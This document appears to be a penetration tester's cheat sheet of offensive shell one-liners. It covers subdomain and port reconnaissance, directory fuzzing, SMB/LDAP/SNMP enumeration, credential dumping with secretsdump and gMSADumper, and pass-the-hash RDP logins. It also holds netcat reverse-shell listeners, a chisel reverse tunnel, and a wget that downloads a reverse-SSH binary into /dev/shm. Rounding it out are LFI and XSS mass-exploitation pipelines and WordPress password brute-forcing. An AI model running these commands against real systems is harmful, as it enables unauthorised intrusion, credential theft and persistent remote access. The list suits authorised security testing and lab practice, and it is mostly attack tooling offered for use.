./chisel server -p 8000 --reverse
amap -d 192.168.10.10 4455
assetfinder google.com
chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1
cat mailroom-ffuf.json| jq '.results[]|select(.status == '200')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
cat mailroom-ffuf.json| jq '.results[]|select(.status == '403')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
cat mailroom-ffuf.json| jq '.results[]|select(.status == '404')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
cat mailroom-ffuf.json| jq '.results[]|select(.status == '500')' | jq -c '{url:.url,length:.length}' | sort -u -t, -k2 | awk -F '"' '{print $4}' > 200.txt
cewl --depth 10 --with-numbers --write cewl.txt 192.168.10.10
cloudfail.py --target seo.com --tor
cloudscrap -u $URL -p 3 -d 3
clusterd -i "http://$TARGET/"
dirb http://192.168.10.10 /usr/share/seclists/Discovery/Web-Content/big.txt
dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt -u "http://$TARGET/"
cho "http://$TARGET/" | hakrawler -d 10
export AGENT='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36'
export DOMAIN=
export IP=
export NAME=
export TARGET=
export USER=
ffuf -c -t 5 -rate 20 -p 0.2 -H "User-Agent: $AGENT" -ac -o $NAME.json -of json -mc 200,302,422,403 -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 30 -p 0.2 -H "User-Agent: $AGENT" -r -ac -o $NAME.json -of json -mc 200,302,403 -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u http://$DOMAIN/FUZZ
ffuf -c -t 5 -rate 30 -p 0.2 -H "User-Agent: $AGENT" -o $NAME_domains.json -of json -H "Host:FUZZ.$DOMAIN" -mc 200,403 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$DOMAIN/
ffuf -request REQUESTFILE -request-proto http -w PATH/TO/WORDLIST -fs 0 -c
find DIR -type f -newermt YYYY-MM-DD ! -newermt YYYY-MM-DD > /dev/null
gMSADumper.py -d "$DOMAIN" -l "$DC_HOST" -u "$USER" -p "$PASSWORD"
gobuster dir -w `fzf-wordlists` -t 20 -x php,txt,pl,sh,asp,aspx,html,json,py,cfm,rb,cgi,bak,tar.gz,tgz,zip -u "http://$TARGET/"
gobuster dir -w `fzf-wordlists` -u http://192.168.56.0:8000/
h8mail -t test@gmail.com
httpx -probe -list hosts.txt -tech-detect -status-code -fr
ipinfo 1.1.1.1
logfile $TARGET
masscan -v -p 1-65535 --rate=10000 -e eth0 192.168.56.0/24
masscan -v -p 1-65535,U:1-65535 --rate=10000 -e eth0 192.168.56.0/24
mkdir -p test/{recon,exploit,report}
moodlescan -r -u "http://$TARGET/"
mount -o domain="$DOMAIN" -o username="$USER" -o password="$PASSWORD" -t cifs "//$DC_HOST/SYSVOL" /tmp/mnttarget/
mysql $IP -u $USER -p
nc -nvlp
ngrok authtoken AUTHTOKEN:::https://dashboard.ngrok.com/get-started/your-authtoken
nmap --script 'smb-enum*' --script-args unsafe=1 -T5 192.168.10.10
nmap --script broadcast-dhcp-discover
nmap --script http-ntlm-info --script-args http-ntlm-info.root=/ews/ -p 443 mx.example.com
nmap --script smb-enum-shares -p 139,445 -T4 -Pn 192.168.10.10
nmap --script=ldap-search -p 389 192.168.10.10
nmap -p 5900 --script=realvnc-auth-bypass 192.168.10.10
nmap -sC -sV -oA $NAME-nmap/$NAME -p- $IP
nmap -sS -n --open -p 88 192.168.56.0/24
nmblookup -A 192.168.10.10
nslookup -type=srv _gc._tcp."$DOMAIN"
nslookup -type=srv _kerberos._tcp."$DOMAIN"
nslookup -type=srv _kpasswd._tcp."$DOMAIN"
nslookup -type=srv _ldap._tcp."$DOMAIN"
nslookup -type=srv _ldap._tcp.dc._msdcs."$DOMAIN"
nslookup _ldap._tcp.dc._msdcs."$DOMAIN"
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.10.10
onesixtyone 192.168.10.10 manager
onesixtyone 192.168.10.10 private
onesixtyone 192.168.10.10 public
onionsearch 'computer'
onionsearch 'computer' --engines tor66 deeplink phobos --limit 3
openssl req -newkey rsa:2048 -nodes -keyout ignite.key -x509 -days 1000 -subj '/CN=blog.r0land.link/O=f0zy./C=IN' -out ignite.crt
openssl pkcs12 -in cert.pem -inkey priv.key -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
portscan
ps-shell
rlwrap -cAr nc -lvnp $PORT
rlwrap nc -lvnp 1337
rlwrap nc -nvlp $PORT
rpcclient -U "$DOMAIN"/"$USER" "$TARGET"
rpcclient -U '' -N "$DC_HOST"
rpcdump.py "$DC_HOST" | grep -A 6 MS-RPRN
scp chisel -i id_rsa $USER@$DOMAIN:/dev/shm/chisel
scp pspy64 -i id_rsa $USER@$DOMAIN:/dev/shm/psi
secretsdump
mtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 192.168.10.10
snmpwalk -c public -v 1 192.168.10.10
snmpwalk -c public -v 2c 192.168.10.10
snmpwalk -v2c -c COMMUNITYSTRING IP
sqlmap -r request.req --risk=3 --level=5 --dbms
sqlmap -u "http://localhost:8081/?id=" --risk 3 --level 5
ssh $USER@$DOMAIN 
ssh $USER@$IP
ssh-keygen -t rsa -b 4096 -f keyname
stat FILE
subfinder -d freelancer.com
subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl
sublist3r -v -d "$DOMAIN"
sudo impacket-smbserver share . -smb2support
sudo nmap -sU --min-rate 10000 --reason IP
sudo nmap -sU --min-rate 10000 -oA nmap/udp $IP -v
sudo nmap -sU --top-ports 10 IP -v
sudo tcpdump -v -w capture.cap
tiktok-scraper user USERNAME -d -n 100
tls-scanner -connect "$TARGET":443
toutatis.py -s SESSIONID -u starbucks
turbo -d $DOMAIN -t 5
waybackurls $URL
waybackurls target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
waybackurls target.com | grep '=' |qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
waybackurls domain.com| grep - -color -E "1.xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar"
wget -r --no-parent --reject "index.html*" $ADDRESS
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
wget http://IP:PORT/reverse-ssh
whatweb -a 1 -U=$AGENT -t 10 --wait=0.2 http://$IP/
whatweb http://$IP/
whatweb https://$IP/
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --enumerate u1-20
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-detection aggressive
wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt
xfreerdp /d:"$DOMAIN" /u:"$USER" /pth:"$NT_HASH" /v:"$TARGET" /cert-ignore
